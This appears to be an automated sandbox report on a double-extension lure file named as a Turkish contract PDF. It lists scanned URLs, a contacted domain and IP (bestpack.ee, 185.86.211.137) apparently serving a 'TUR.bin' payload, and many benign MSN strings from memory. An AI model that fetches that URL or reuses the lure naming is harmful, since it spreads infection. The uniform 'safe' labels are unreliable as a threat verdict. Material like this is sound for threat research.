        URLs

        SourceDetectionScannerLabelLink
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or-dark0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/markets?id=a3oxnm0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240908.1/Weather/W06_Clou0%Avira URL Cloudsafe
        https://www.msn.com/en-us/play/games/jewel-quest/cg-9nsc1kr9d85l0%Avira URL Cloudsafe
        https://www.msn.com/en-us/weather/forecast/in-Prague%2CCapital-City-of-Prague?loc=eyJsIjoiUHJhZ3VlIi0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=c5203baa-43e3-322d-3163-3e107126fcab&user=m0%Avira URL Cloudsafe
        https://cntraveler.com/stories/2014-11-22/madison-wisconsin-where-to-eat-stay-play0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-dark0%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/politics/rejecting-trump-s-demands-judge-chutkan-reminds-him-who-s-in0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/0%Avira URL Cloudsafe
        https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=04d557f3-74b2-41ba-a75a-06ef0%Avira URL Cloudsafe
        https://www.msn.com/en-us/play/games/dinosaurs-merge-master/cg-9n7mhcswnqrj0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/world/18-little-known-facts-about-world-war-ii/ss-BB1nriLY0%Avira URL Cloudsafe
        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/CommuteLightV3.svg0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1v-dark0%Avira URL Cloudsafe
        https://bestpack.ee/TUR.bina0%Avira URL Cloudsafe
        https://bestpack.ee/TUR.bini0%Avira URL Cloudsafe
        https://bestpack.ee/0%Avira URL Cloudsafe
        http://bestpack.ee/TUR.bin0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
        https://www.msn.com/en-us/health/medical/this-might-be-the-easiest-way-to-mak0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/0%Avira URL Cloudsafe
        https://www.msn.com/en-us/health/other/the-5-carbs-you-should-be-eating-for-insulin-resistance-accor0%Avira URL Cloudsafe
        https://www.msn.com/en-us/sports/nba/the-really-challenging-ones-were-heavy-and-mechanical-hakeem-ol0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/realestate/tour-of-original-1949-frank-lloyd-wright-home-in-michigan0%Avira URL Cloudsafe
        https://www.msn.com/en-us/health/other/vacuum-sealing-certain-foods-could-make-you-sick-here-are-7-t0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/markets?id=a6qja20%Avira URL Cloudsafe
        https://api.msn.coh0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=2468e4af-2f20-1a22-40fc-e932fe5418aa&user=m0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.png0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=efc0e9b1-9066-1580-027c-a67871a7b751&user=m0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=b7a76276-375a-718b-52d9-49eae9b263a4&user=m0%Avira URL Cloudsafe
        https://excel.office.com5u0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?activityId=DA71348FD4774D4D889B34089BDD2919&timeOut=5000&oc0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2117Image.png0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/currency/svg-animation/light2/g0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/other/nvidia-stock-jumps-on-report-ceo-jensen-huang-is-done-selling-0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=bd48a5b1-961c-df36-94e0-ff284105d179&user=m0%Avira URL Cloudsafe
        https://financebuzz.com/stress-free-retirement?utm_source=msn-money&utm_medium=feed&synd_slide=1&syn0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=912df6f3-e6f5-4400-ad10-cce4578ef73c&user=m0%Avira URL Cloudsafe
        https://bestpack.ee/TUR.bin0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/0%Avira URL Cloudsafe
        https://wallethub.com/profile/chip-lupo-15149105i0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://www.cntraveler.com/galleries/2016-03-28/the-10-best-beaches-in-florida?mbid=synd_msn_rss&utm0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.svg0%Avira URL Cloudsafe
        https://www.msn.com/en-us/foodanddrink/cookingschool/for-the-best-grilled-clams-avoid-this-fatal-mis0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=11ebfe0a-8a02-10e8-c862-80adb116274c&user=m0%Avira URL Cloudsafe
        https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/technology/scientists-probed-a-medieval-alchemist-s-artifacts-and-fou0%Avira URL Cloudsafe
        https://wallethub.com/edu/best-places-to-retire/61650%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ0%Avira URL Cloudsafe
        https://financebuzz.com/supplement-income-social-security-55mp?utm_source=msn-money&utm_medium=feed&0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/0%Avira URL Cloudsafe
        http://bestpack.ee/TUR.binI0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13glq1-dark0%Avira URL Cloudsafe
        https://www.pollensense.com/0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9d-3aff-8309-7d07d4031798&user=m0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2112Image.png0%Avira URL Cloudsafe
        https://www.bestplaces.net/docs/datasource.aspx0%Avira URL Cloudsafe
        https://www.msn.com/en-us/feed0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weathe0%Avira URL Cloudsafe
        http://bestpack.ee/TUR.binA0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/politics/pelosi-says-cnn-shouldn-t-air-trump-remarks-on-harris-s-cogn0%Avira URL Cloudsafe
        https://aka.ms/odirm0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm0%Avira URL Cloudsafe
        https://powerpoint.office.comEM.W0%Avira URL Cloudsafe
        https://www.msn.com/en-us/news/us/sen-tuberville-blocks-promotion-of-lloyd-austin-s-top-military-aid0%Avira URL Cloudsafe
        https://www.msn.com/en-us/sports/nba/don-t-know-what-to-say-phil-jackson-on-pau-gasol-and-matt-barne0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1v0%Avira URL Cloudsafe
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2113Image.png0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/other/elon-musk-says-humans-could-soon-be-heading-to-mars-this-forme0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://bestpack.ee/TUR.bin70%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=ccc6e965-470d-863f-66c1-91cdaa7267c8&user=m0%Avira URL Cloudsafe
        https://www.cntraveler.com/destinations/miami?mbid=synd_msn_rss&utm_source=msn&utm_medium=syndicatio0%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/markets?id=a33k6h0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t0%Avira URL Cloudsafe
        https://www.msn.com/en-us/play/games/mini-golf-saga/cg-9nqhx1w02dpr0%Avira URL Cloudsafe
        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%Avira URL Cloudsafe
        https://wns.windows.com/art0%Avira URL Cloudsafe
        https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
        https://www.msn.com/en-us/sports/nba/wnba-attendance-record-shattered-as-20-000-watch-caitlin-clark-0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bestpack.ee
        		185.86.211.137
        		truefalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://bestpack.ee/TUR.binfalse
          • Avira URL Cloud: safe
          		unknown
          https://bestpack.ee/TUR.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240908.1/Weather/W06_Clouexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-darkexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=c5203baa-43e3-322d-3163-3e107126fcab&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cntraveler.com/stories/2014-11-22/madison-wisconsin-where-to-eat-stay-playexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/forecast/in-Prague%2CCapital-City-of-Prague?loc=eyJsIjoiUHJhZ3VlIiexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/jewel-quest/cg-9nsc1kr9d85lexplorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25110748923.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28293859220.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or-darkexplorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/politics/rejecting-trump-s-demands-judge-chutkan-reminds-him-who-s-inexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=04d557f3-74b2-41ba-a75a-06efexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.pngexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiqexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.gopher.ftp://ftp.D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/play/games/dinosaurs-merge-master/cg-9n7mhcswnqrjexplorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/world/18-little-known-facts-about-world-war-ii/ss-BB1nriLYexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/CommuteLightV3.svgexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1v-darkexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://bestpack.ee/TUR.binaD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://bestpack.ee/D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027FE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://bestpack.ee/TUR.biniD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/medical/this-might-be-the-easiest-way-to-makexplorer.exe, 00000005.00000000.25106975292.0000000009091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSdexplorer.exe, 00000005.00000002.28294714701.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000CA80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25843217230.000000000CA90000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/other/the-5-carbs-you-should-be-eating-for-insulin-resistance-accorexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/sports/nba/the-really-challenging-ones-were-heavy-and-mechanical-hakeem-olexplorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/other/vacuum-sealing-certain-foods-could-make-you-sick-here-are-7-texplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.cohexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/realestate/tour-of-original-1949-frank-lloyd-wright-home-in-michiganexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=2468e4af-2f20-1a22-40fc-e932fe5418aa&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=efc0e9b1-9066-1580-027c-a67871a7b751&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=b7a76276-375a-718b-52d9-49eae9b263a4&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.pngexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.com5uexplorer.exe, 00000005.00000002.28299456697.0000000010BD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115051280.0000000010BD5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=DA71348FD4774D4D889B34089BDD2919&timeOut=5000&ocexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2117Image.pngexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=bd48a5b1-961c-df36-94e0-ff284105d179&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/currency/svg-animation/light2/gexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/other/nvidia-stock-jumps-on-report-ceo-jensen-huang-is-done-selling-explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://financebuzz.com/stress-free-retirement?utm_source=msn-money&utm_medium=feed&synd_slide=1&synexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/sports/blended?market=en-us&satoriid=912df6f3-e6f5-4400-ad10-cce4578ef73c&user=mexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000000.25102736177.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25103759526.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28284053552.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000CA80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25843217230.000000000CA90000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000002.28293859220.000000000C9A4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000C9A4000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.cntraveler.com/galleries/2016-03-28/the-10-best-beaches-in-florida?mbid=synd_msn_rss&utmexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.quovadis.bm0D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://wallethub.com/profile/chip-lupo-15149105iexplorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.svgexplorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/foodanddrink/cookingschool/for-the-best-grilled-clams-avoid-this-fatal-misexplorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
